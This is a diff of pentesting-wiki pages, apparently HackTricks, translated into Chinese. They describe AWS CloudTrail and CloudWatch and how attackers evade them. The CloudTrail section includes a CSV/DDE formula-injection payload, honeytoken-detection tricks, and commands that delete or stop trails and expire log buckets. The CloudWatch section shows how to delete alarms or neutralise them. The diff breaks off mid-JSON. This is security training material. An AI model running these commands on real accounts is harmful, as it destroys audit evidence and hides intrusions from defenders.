-## Actions - -### Enumeration +## 操作 +### 枚举 ```bash # Get trails info aws cloudtrail list-trails @@ -125,125 +122,113 @@ aws cloudtrail list-event-data-stores aws cloudtrail list-queries --event-data-store aws cloudtrail get-query-results --event-data-store --query-id ``` +### **CSV 注入** -### **CSV Injection** - -It's possible to perform a CVS injection inside CloudTrail that will execute arbitrary code if the logs are exported in CSV and open with Excel.\ -The following code will generate log entry with a bad Trail name containing the payload: - +在 CloudTrail 中执行 CVS 注入是可能的,如果日志以 CSV 格式导出并在 Excel 中打开,将执行任意代码。\ +以下代码将生成一个包含有效负载的坏 Trail 名称的日志条目: ```python import boto3 payload = "=cmd|'/C calc'|''" client = boto3.client('cloudtrail') response = client.create_trail( - Name=payload, - S3BucketName="random" +Name=payload, +S3BucketName="random" ) print(response) ``` - -For more information about CSV Injections check the page: +有关 CSV 注入的更多信息,请查看页面: {{#ref}} https://book.hacktricks.xyz/pentesting-web/formula-injection {{#endref}} -For more information about this specific technique check [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/) +有关此特定技术的更多信息,请查看 [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/) -## **Bypass Detection** +## **绕过检测** -### HoneyTokens **bypass** +### HoneyTokens **绕过** -Honeyokens are created to **detect exfiltration of sensitive information**. In case of AWS, they are **AWS keys whose use is monitored**, if something triggers an action with that key, then someone must have stolen that key. +HoneyTokens 的创建是为了 **检测敏感信息的外泄**。在 AWS 的情况下,它们是 **使用受到监控的 AWS 密钥**,如果某个操作触发了该密钥的动作,那么就必须有人窃取了该密钥。 -However, Honeytokens like the ones created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) are either using recognizable account name or using the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making Cloudtrail create any log, **you could know if the key is a honeytoken or not**. 
+然而,像 [**Canarytokens**](https://canarytokens.org/generate)**、** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**、** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) 创建的 HoneyTokens 要么使用可识别的账户名称,要么为所有客户使用相同的 AWS 账户 ID。因此,如果您可以在不让 Cloudtrail 创建任何日志的情况下获取账户名称和/或账户 ID,**您就可以知道该密钥是否是 HoneyToken**。

-[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has some rules to detect if a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:**
+[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) 有一些规则来检测密钥是否属于 [**Canarytokens**](https://canarytokens.org/generate)**、** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**、** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:**

-- If **`canarytokens.org`** appears in the role name or the account ID **`534261010715`** appears in the error message.
- - Testing them more recently, they are using the account **`717712589309`** and still has the **`canarytokens.com`** string in the name.
-- If **`SpaceCrab`** appears in the role name in the error message
-- **SpaceSiren** uses **uuids** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}`
-- If the **name looks like randomly generated**, there are high probabilities that it's a HoneyToken.
+- 如果 **`canarytokens.org`** 出现在角色名称中,或者账户 ID **`534261010715`** 出现在错误消息中。
+  - 最近测试时,他们使用的账户是 **`717712589309`**,并且名称中仍然包含 **`canarytokens.com`** 字符串。
+- 如果 **`SpaceCrab`** 出现在错误消息中的角色名称中。
+- **SpaceSiren** 使用 **uuids** 生成用户名:`[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}`
+- 如果 **名称看起来像是随机生成的**,那么它是 HoneyToken 的概率很高。

-#### Get the account ID from the Key ID
-
-You can get the **Account ID** from the **encoded** inside the **access key** as [**explained here**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) and check the account ID with your list of Honeytokens AWS accounts:
+#### 从密钥 ID 获取账户 ID
+您可以从 **访问密钥** 中 **编码** 的信息获取 **账户 ID**,如 [**此处所述**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489),并将该账户 ID 与您的 HoneyToken AWS 账户列表进行比对:
```python
import base64
import binascii

def AWSAccount_from_AWSKeyID(AWSKeyID):
- trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix
- x = base64.b32decode(trimmed_AWSKeyID) #base32 decode
- y = x[0:6]
+    trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix
+    x = base64.b32decode(trimmed_AWSKeyID) #base32 decode
+    y = x[0:6]

- z = int.from_bytes(y, byteorder='big', signed=False)
- mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)
+    z = int.from_bytes(y, byteorder='big', signed=False)
+    mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)

- e = (z & mask)>>7
- return (e)
+    e = (z & mask)>>7
+    return (e)

print("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML")))
```
+检查更多信息请访问 [**原始研究**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489)。

-Check more information in the [**orginal research**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489). 
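也可以换一种方式获取密钥所属的账户 ID:用你自己(攻击者)账户的凭证调用 STS 的 `GetAccessKeyInfo`。由于请求由你自己的凭证签名,对应的 CloudTrail 事件只会出现在你自己的账户中,而不是密钥所属的账户。下面是一个最小示例,沿用上文脚本中的示例密钥 ID:

```bash
# 使用自己账户的凭证执行;返回该访问密钥所属的账户 ID
aws sts get-access-key-info --access-key-id ASIAQNZGKIQY56JQ7WML
```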
+#### 不生成日志 -#### Do not generate a log +最有效的技术实际上是一个简单的方法。只需使用您刚找到的密钥访问您自己攻击者账户中的某个服务。这将使**CloudTrail在您自己的AWS账户中生成日志,而不是在受害者账户中**。 -The most effective technique for this is actually a simple one. Just use the key you just found to access some service inside your own attackers account. This will make **CloudTrail generate a log inside YOUR OWN AWS account and not inside the victims**. +问题在于,输出将显示一个错误,指示账户ID和账户名称,因此**您将能够看到它是否是一个Honeytoken**。 -The things is that the output will show you an error indicating the account ID and the account name so **you will be able to see if it's a Honeytoken**. +#### 没有日志的AWS服务 -#### AWS services without logs +过去有一些**AWS服务不会将日志发送到CloudTrail**(在这里找到[列表](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html))。其中一些服务将**响应**一个**错误**,其中包含**密钥角色的ARN**,如果有人未经授权(即Honeytoken密钥)尝试访问它。 -In the past there were some **AWS services that doesn't send logs to CloudTrail** (find a [list here](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html)). Some of those services will **respond** with an **error** containing the **ARN of the key role** if someone unauthorised (the honeytoken key) try to access it. - -This way, an **attacker can obtain the ARN of the key without triggering any log**. In the ARN the attacker can see the **AWS account ID and the name**, it's easy to know the HoneyToken's companies accounts ID and names, so this way an attacker can identify id the token is a HoneyToken. +通过这种方式,**攻击者可以在不触发任何日志的情况下获取密钥的ARN**。在ARN中,攻击者可以看到**AWS账户ID和名称**,很容易知道HoneyToken的公司账户ID和名称,因此攻击者可以识别该令牌是否是HoneyToken。 ![](<../../../../images/image (93).png>) > [!CAUTION] -> Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own... +> 请注意,所有被发现不创建CloudTrail日志的公共API现在已修复,因此您可能需要自己寻找... > -> For more information check the [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/). +> 有关更多信息,请查看[**原始研究**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/)。 -### Accessing Third Infrastructure +### 访问第三方基础设施 -Certain AWS services will **spawn some infrastructure** such as **Databases** or **Kubernetes** clusters (EKS). A user **talking directly to those services** (like the Kubernetes API) **won’t use the AWS API**, so CloudTrail won’t be able to see this communication. +某些AWS服务将**生成一些基础设施**,例如**数据库**或**Kubernetes**集群(EKS)。用户**直接与这些服务交互**(如Kubernetes API)**不会使用AWS API**,因此CloudTrail将无法看到此通信。 -Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and **talk to the API service directly without getting detected by Cloudtrail**. 
+因此,具有EKS访问权限的用户如果发现EKS API的URL,可以在本地生成一个令牌,并**直接与API服务交谈而不被Cloudtrail检测到**。 -More info in: +更多信息请参见: {{#ref}} ../../aws-post-exploitation/aws-eks-post-exploitation.md {{#endref}} -### Modifying CloudTrail Config - -#### Delete trails +### 修改CloudTrail配置 +#### 删除轨迹 ```bash aws cloudtrail delete-trail --name [trail-name] ``` - -#### Stop trails - +#### 停止跟踪 ```bash aws cloudtrail stop-logging --name [trail-name] ``` - -#### Disable multi-region logging - +#### 禁用多区域日志记录 ```bash aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services ``` - -#### Disable Logging by Event Selectors - +#### 通过事件选择器禁用日志记录 ```bash # Leave only the ReadOnly selector aws cloudtrail put-event-selectors --trail-name --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region @@ -251,49 +236,42 @@ aws cloudtrail put-event-selectors --trail-name --event-selectors ' # Remove all selectors (stop Insights) aws cloudtrail put-event-selectors --trail-name --event-selectors '[]' --region ``` +在第一个示例中,提供了一个包含单个对象的 JSON 数组作为事件选择器。`"ReadWriteType": "ReadOnly"` 表示 **事件选择器仅应捕获只读事件**(因此 CloudTrail insights **不会检查写入** 事件,例如)。 -In the first example, a single event selector is provided as a JSON array with a single object. The `"ReadWriteType": "ReadOnly"` indicates that the **event selector should only capture read-only events** (so CloudTrail insights **won't be checking write** events for example). - -You can customize the event selector based on your specific requirements. - -#### Logs deletion via S3 lifecycle policy +您可以根据您的具体要求自定义事件选择器。 +#### 通过 S3 生命周期策略删除日志 ```bash aws s3api put-bucket-lifecycle --bucket --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region ``` +### 修改桶配置 -### Modifying Bucket Configuration +- 删除 S3 桶 +- 更改桶策略以拒绝来自 CloudTrail 服务的任何写入 +- 向 S3 桶添加生命周期策略以删除对象 +- 禁用用于加密 CloudTrail 日志的 kms 密钥 -- Delete the S3 bucket -- Change bucket policy to deny any writes from the CloudTrail service -- Add lifecycle policy to S3 bucket to delete objects -- Disable the kms key used to encrypt the CloudTrail logs +### Cloudtrail 勒索软件 -### Cloudtrail ransomware +#### S3 勒索软件 -#### S3 ransomware - -You could **generate an asymmetric key** and make **CloudTrail encrypt the data** with that key and **delete the private key** so the CloudTrail contents cannot be recovered cannot be recovered.\ -This is basically a **S3-KMS ransomware** explained in: +您可以 **生成一个非对称密钥** 并使 **CloudTrail 使用该密钥加密数据**,然后 **删除私钥**,以便 CloudTrail 内容无法恢复。\ +这基本上是 **S3-KMS 勒索软件**,详见: {{#ref}} ../../aws-post-exploitation/aws-s3-post-exploitation.md {{#endref}} -**KMS ransomware** +**KMS 勒索软件** -This is an easiest way to perform the previous attack with different permissions requirements: +这是以不同权限要求执行前述攻击的最简单方法: {{#ref}} ../../aws-post-exploitation/aws-kms-post-exploitation.md {{#endref}} -## **References** +## **参考文献** - [https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md index 0c790b881..0ec23154f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md +++ 
b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md @@ -4,143 +4,142 @@ ## CloudWatch -**CloudWatch** **collects** monitoring and operational **data** in the form of logs/metrics/events providing a **unified view of AWS resources**, applications and services.\ -CloudWatch Log Event have a **size limitation of 256KB on each log line**.\ -It can set **high resolution alarms**, visualize **logs** and **metrics** side by side, take automated actions, troubleshoot issues, and discover insights to optimize applications. +**CloudWatch** **收集** 监控和操作 **数据**,以日志/指标/事件的形式提供 **AWS 资源**、应用程序和服务的 **统一视图**。\ +CloudWatch 日志事件的 **每行日志大小限制为 256KB**。\ +它可以设置 **高分辨率警报**,并并排可视化 **日志** 和 **指标**,采取自动化行动,排除故障,并发现洞察以优化应用程序。 -You can monitor for example logs from CloudTrail. Events that are monitored: +例如,您可以监控来自 CloudTrail 的日志。监控的事件包括: -- Changes to Security Groups and NACLs -- Starting, Stopping, rebooting and terminating EC2 instances -- Changes to Security Policies within IAM and S3 -- Failed login attempts to the AWS Management Console -- API calls that resulted in failed authorization -- Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) +- 对安全组和 NACL 的更改 +- 启动、停止、重启和终止 EC2 实例 +- IAM 和 S3 中安全策略的更改 +- 对 AWS 管理控制台的登录失败尝试 +- 导致授权失败的 API 调用 +- 在 CloudWatch 中搜索的过滤器: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) -## Key concepts +## 关键概念 -### Namespaces +### 命名空间 -A namespace is a container for CloudWatch metrics. It helps to categorize and isolate metrics, making it easier to manage and analyze them. +命名空间是 CloudWatch 指标的容器。它有助于对指标进行分类和隔离,使管理和分析变得更容易。 -- **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics. +- **示例**:AWS/EC2 用于与 EC2 相关的指标,AWS/RDS 用于 RDS 指标。 -### Metrics +### 指标 -Metrics are data points collected over time that represent the performance or utilization of AWS resources. Metrics can be collected from AWS services, custom applications, or third-party integrations. +指标是随时间收集的数据点,代表 AWS 资源的性能或利用率。指标可以从 AWS 服务、自定义应用程序或第三方集成中收集。 -- **Example**: CPUUtilization, NetworkIn, DiskReadOps. +- **示例**:CPUUtilization、NetworkIn、DiskReadOps。 -### Dimensions +### 维度 -Dimensions are key-value pairs that are part of metrics. They help to uniquely identify a metric and provide additional context, being 30 the most number of dimensions that can be associated with a metric. Dimensions also allow to filter and aggregate metrics based on specific attributes. +维度是指标的一部分的键值对。它们有助于唯一标识一个指标并提供额外的上下文,最多可以与一个指标关联 30 个维度。维度还允许根据特定属性过滤和聚合指标。 -- **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone. +- **示例**:对于 EC2 实例,维度可能包括 InstanceId、InstanceType 和 AvailabilityZone。 -### Statistics +### 统计信息 -Statistics are mathematical calculations performed on metric data to summarize it over time. Common statistics include Average, Sum, Minimum, Maximum, and SampleCount. +统计信息是对指标数据进行的数学计算,以便随时间对其进行汇总。常见的统计信息包括平均值、总和、最小值、最大值和样本计数。 -- **Example**: Calculating the average CPU utilization over a period of one hour. +- **示例**:计算一小时内的平均 CPU 利用率。 -### Units +### 单位 -Units are the measurement type associated with a metric. Units help to provide context and meaning to the metric data. Common units include Percent, Bytes, Seconds, Count. 
+单位是与指标相关的测量类型。单位有助于为指标数据提供上下文和意义。常见单位包括百分比、字节、秒、计数。 -- **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes. +- **示例**:CPUUtilization 可能以百分比为单位,而 NetworkIn 可能以字节为单位。 -## CloudWatch Features +## CloudWatch 特性 -### Dashboard +### 仪表板 -**CloudWatch Dashboards** provide customizable **views of your AWS CloudWatch metrics**. It is possible to create and configure dashboards to visualize data and monitor resources in a single view, combining different metrics from various AWS services. +**CloudWatch 仪表板** 提供可自定义的 **AWS CloudWatch 指标视图**。可以创建和配置仪表板,以在单一视图中可视化数据并监控资源,结合来自各种 AWS 服务的不同指标。 -**Key Features**: +**关键特性**: -- **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more. -- **Customization**: Layout and content can be customized to fit specific monitoring needs. +- **小部件**:仪表板的构建块,包括图表、文本、警报等。 +- **自定义**:布局和内容可以根据特定监控需求进行自定义。 -**Example Use Case**: +**示例用例**: -- A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets. +- 一个仪表板显示您整个 AWS 环境的关键指标,包括 EC2 实例、RDS 数据库和 S3 存储桶。 -### Metric Stream and Metric Data +### 指标流和指标数据 -**Metric Streams** in AWS CloudWatch enable you to continuously stream CloudWatch metrics to a destination of your choice in near real-time. This is particularly useful for advanced monitoring, analytics, and custom dashboards using tools outside of AWS. +**指标流** 在 AWS CloudWatch 中使您能够近乎实时地持续流式传输 CloudWatch 指标到您选择的目标。这对于使用 AWS 之外的工具进行高级监控、分析和自定义仪表板特别有用。 -**Metric Data** inside Metric Streams refers to the actual measurements or data points that are being streamed. These data points represent various metrics like CPU utilization, memory usage, etc., for AWS resources. +**指标数据** 在指标流中指的是正在流式传输的实际测量或数据点。这些数据点代表 AWS 资源的各种指标,如 CPU 利用率、内存使用等。 -**Example Use Case**: +**示例用例**: -- Sending real-time metrics to a third-party monitoring service for advanced analysis. -- Archiving metrics in an Amazon S3 bucket for long-term storage and compliance. +- 将实时指标发送到第三方监控服务以进行高级分析。 +- 将指标存档到 Amazon S3 存储桶中以进行长期存储和合规性。 -### Alarm +### 警报 -**CloudWatch Alarms** monitor your metrics and perform actions based on predefined thresholds. When a metric breaches a threshold, the alarm can perform one or more actions such as sending notifications via SNS, triggering an auto-scaling policy, or running an AWS Lambda function. +**CloudWatch 警报** 监控您的指标并根据预定义的阈值执行操作。当指标突破阈值时,警报可以执行一个或多个操作,例如通过 SNS 发送通知、触发自动扩展策略或运行 AWS Lambda 函数。 -**Key Components**: +**关键组件**: -- **Threshold**: The value at which the alarm triggers. -- **Evaluation Periods**: The number of periods over which data is evaluated. -- **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm -- **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS). +- **阈值**:触发警报的值。 +- **评估周期**:评估数据的周期数。 +- **触发警报的数据点**:触发警报所需达到阈值的周期数。 +- **操作**:当警报状态被触发时发生的事情(例如,通过 SNS 通知)。 -**Example Use Case**: +**示例用例**: -- Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes. +- 监控 EC2 实例的 CPU 利用率,如果超过 80% 持续 5 分钟,则通过 SNS 发送通知。 -### Anomaly Detectors +### 异常检测器 -**Anomaly Detectors** use machine learning to automatically detect anomalies in your metrics. You can apply anomaly detection to any CloudWatch metric to identify deviations from normal patterns that might indicate issues. 
+**异常检测器** 使用机器学习自动检测您的指标中的异常。您可以将异常检测应用于任何 CloudWatch 指标,以识别可能表明问题的正常模式的偏差。 -**Key Components**: +**关键组件**: -- **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like. -- **Anomaly Detection Band**: A visual representation of the expected range of values for a metric. +- **模型训练**:CloudWatch 使用历史数据训练模型并建立正常行为的标准。 +- **异常检测带**:指标预期值范围的可视化表示。 -**Example Use Case**: +**示例用例**: -- Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue. +- 检测 EC2 实例中异常的 CPU 利用率模式,这可能表明安全漏洞或应用程序问题。 -### Insight Rules and Managed Insight Rules +### 洞察规则和托管洞察规则 -**Insight Rules** allow you to identify trends, detect spikes, or other patterns of interest in your metric data using **powerful mathematical expressions** to define the conditions under which actions should be taken. These rules can help you identify anomalies or unusual behaviors in your resource performance and utilization. +**洞察规则** 允许您使用 **强大的数学表达式** 来定义应采取行动的条件,以识别趋势、检测峰值或其他感兴趣的模式。这些规则可以帮助您识别资源性能和利用率中的异常或不寻常行为。 -**Managed Insight Rules** are pre-configured **insight rules provided by AWS**. They are designed to monitor specific AWS services or common use cases and can be enabled without needing detailed configuration. +**托管洞察规则** 是 AWS 提供的预配置 **洞察规则**。它们旨在监控特定的 AWS 服务或常见用例,可以在无需详细配置的情况下启用。 -**Example Use Case**: +**示例用例**: -- Monitoring RDS Performance: Enable a managed insight rule for Amazon RDS that monitors key performance indicators such as CPU utilization, memory usage, and disk I/O. If any of these metrics exceed safe operational thresholds, the rule can trigger an alert or automated mitigation action. +- 监控 RDS 性能:启用一个针对 Amazon RDS 的托管洞察规则,监控关键性能指标,如 CPU 利用率、内存使用和磁盘 I/O。如果这些指标中的任何一个超过安全操作阈值,该规则可以触发警报或自动缓解措施。 -### CloudWatch Logs +### CloudWatch 日志 -Allows to **aggregate and monitor logs from applications** and systems from **AWS services** (including CloudTrail) and **from apps/systems** (**CloudWatch Agen**t can be installed on a host). Logs can be **stored indefinitely** (depending on the Log Group settings) and can be exported. +允许 **聚合和监控来自应用程序** 和系统的日志,来自 **AWS 服务**(包括 CloudTrail)和 **来自应用程序/系统**(**CloudWatch Agent** 可以安装在主机上)。日志可以 **无限期存储**(取决于日志组设置)并可以导出。 -**Elements**: +**元素**: -| **Log Group** | A **collection of log streams** that share the same retention, monitoring, and access control settings | -| ------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | -| **Log Stream** | A sequence of **log events** that share the **same source** | -| **Subscription Filters** | Define a **filter pattern that matches events** in a particular log group, send them to Kinesis Data Firehose stream, Kinesis stream, or a Lambda function | +| **日志组** | 一组 **共享相同保留、监控和访问控制设置的日志流** | +| ---------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | +| **日志流** | 一系列 **共享相同来源的日志事件** | +| **订阅过滤器** | 定义一个 **匹配特定日志组中事件的过滤模式**,将其发送到 Kinesis Data Firehose 流、Kinesis 流或 Lambda 函数 | -### CloudWatch Monitoring & Events +### CloudWatch 监控与事件 -CloudWatch **basic** aggregates data **every 5min** (the **detailed** one does that **every 1 min**). 
After the aggregation, it **checks the thresholds of the alarms** in case it needs to trigger one.\ -In that case, CLoudWatch can be prepared to send an event and perform some automatic actions (AWS lambda functions, SNS topics, SQS queues, Kinesis Streams) +CloudWatch **基本** 每 **5 分钟** 聚合数据(**详细** 每 **1 分钟** 聚合)。在聚合后,它 **检查警报的阈值**,以防需要触发一个。\ +在这种情况下,CloudWatch 可以准备发送事件并执行一些自动操作(AWS Lambda 函数、SNS 主题、SQS 队列、Kinesis 流)。 -### Agent Installation +### 代理安装 -You can install agents inside your machines/containers to automatically send the logs back to CloudWatch. +您可以在机器/容器内部安装代理,以自动将日志发送回 CloudWatch。 -- **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) -- **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage -- **Configure** and **start** the CloudWatch Agent +- **创建** 一个 **角色** 并 **附加** 到具有允许 CloudWatch 从实例收集数据的权限的 **实例**,此外还与 AWS 系统管理 SSM 交互(CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) +- **下载** 并 **安装** **代理** 到 EC2 实例上 ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip))。您可以从 EC2 内部下载,或使用 AWS 系统管理自动安装,选择包 AWS-ConfigureAWSPackage +- **配置** 并 **启动** CloudWatch Agent -A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order. - -## Enumeration +一个日志组有多个流。一个流有多个事件。在每个流内,事件保证是有序的。 +## 枚举 ```bash # Dashboards # @@ -213,250 +212,217 @@ aws events describe-event-source --name aws events list-replays aws events list-api-destinations aws events list-event-buses ``` - ## Post-Exploitation / Bypass ### **`cloudwatch:DeleteAlarms`,`cloudwatch:PutMetricAlarm` , `cloudwatch:PutCompositeAlarm`** -An attacker with this permissions could significantly undermine an organization's monitoring and alerting infrastructure. By deleting existing alarms, an attacker could disable crucial alerts that notify administrators of critical performance issues, security breaches, or operational failures. Furthermore, by creating or modifying metric alarms, the attacker could also mislead administrators with false alerts or silence legitimate alarms, effectively masking malicious activities and preventing timely responses to actual incidents. - -In addition, with the **`cloudwatch:PutCompositeAlarm`** permission, an attacker would be able to create a loop or cycle of composite alarms, where composite alarm A depends on composite alarm B, and composite alarm B also depends on composite alarm A. In this scenario, it is not possible to delete any composite alarm that is part of the cycle because there is always still a composite alarm that depends on that alarm that you want to delete. 
+拥有这些权限的攻击者可能会严重削弱组织的监控和警报基础设施。通过删除现有警报,攻击者可以禁用通知管理员关键性能问题、安全漏洞或操作故障的重要警报。此外,通过创建或修改指标警报,攻击者还可以用虚假警报误导管理员或使合法警报失效,从而有效掩盖恶意活动并阻止对实际事件的及时响应。 +此外,拥有 **`cloudwatch:PutCompositeAlarm`** 权限的攻击者将能够创建一个复合警报的循环或周期,其中复合警报 A 依赖于复合警报 B,而复合警报 B 也依赖于复合警报 A。在这种情况下,无法删除任何属于该循环的复合警报,因为总是还有一个依赖于您想要删除的警报的复合警报。 ```bash aws cloudwatch put-metric-alarm --cli-input-json | --alarm-name --comparison-operator --evaluation-periods [--datapoints-to-alarm ] [--threshold ] [--alarm-description ] [--alarm-actions ] [--metric-name ] [--namespace ] [--statistic ] [--dimensions ] [--period ] aws cloudwatch delete-alarms --alarm-names aws cloudwatch put-composite-alarm --alarm-name --alarm-rule [--no-actions-enabled | --actions-enabled [--alarm-actions ] [--insufficient-data-actions ] [--ok-actions ] ] ``` +以下示例显示了如何使指标警报失效: -The following example shows how to make a metric alarm ineffective: - -- This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic. -- By modifying the Threshold to be more than 99%, setting the Period to 10 seconds, the Evaluation Periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the Datapoints to Alarm to 8640 as well, it would be necessary for the CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm. +- 此指标警报监控特定 EC2 实例的平均 CPU 利用率,每 300 秒评估一次指标,并需要 6 个评估周期(总共 30 分钟)。如果平均 CPU 利用率在这 6 个周期中至少有 4 个周期超过 60%,则警报将触发并向指定的 SNS 主题发送通知。 +- 通过将阈值修改为超过 99%,将周期设置为 10 秒,将评估周期设置为 8640(因为 8640 个 10 秒的周期等于 1 天),并将报警的数据点设置为 8640,CPU 利用率必须在整个 24 小时内每 10 秒超过 99% 才能触发警报。 {{#tabs }} {{#tab name="Original Metric Alarm" }} - ```json { - "Namespace": "AWS/EC2", - "MetricName": "CPUUtilization", - "Dimensions": [ - { - "Name": "InstanceId", - "Value": "i-01234567890123456" - } - ], - "AlarmActions": ["arn:aws:sns:us-east-1:123456789012:example_sns"], - "ComparisonOperator": "GreaterThanThreshold", - "DatapointsToAlarm": 4, - "EvaluationPeriods": 6, - "Period": 300, - "Statistic": "Average", - "Threshold": 60, - "AlarmDescription": "CPU Utilization of i-01234567890123456 over 60%", - "AlarmName": "EC2 instance i-01234567890123456 CPU Utilization" +"Namespace": "AWS/EC2", +"MetricName": "CPUUtilization", +"Dimensions": [ +{ +"Name": "InstanceId", +"Value": "i-01234567890123456" +} +], +"AlarmActions": ["arn:aws:sns:us-east-1:123456789012:example_sns"], +"ComparisonOperator": "GreaterThanThreshold", +"DatapointsToAlarm": 4, +"EvaluationPeriods": 6, +"Period": 300, +"Statistic": "Average", +"Threshold": 60, +"AlarmDescription": "CPU Utilization of i-01234567890123456 over 60%", +"AlarmName": "EC2 instance i-01234567890123456 CPU Utilization" } ``` - {{#endtab }} -{{#tab name="Modified Metric Alarm" }} - +{{#tab name="修改后的指标警报" }} ```json { - "Namespace": "AWS/EC2", - "MetricName": "CPUUtilization", - "Dimensions": [ - { - "Name": "InstanceId", - "Value": "i-0645d6d414dadf9f8" - } - ], - "AlarmActions": [], - "ComparisonOperator": "GreaterThanThreshold", - "DatapointsToAlarm": 8640, - "EvaluationPeriods": 8640, - "Period": 10, - "Statistic": "Average", - "Threshold": 99, - "AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold", - "AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization" +"Namespace": "AWS/EC2", +"MetricName": "CPUUtilization", +"Dimensions": [ +{ 
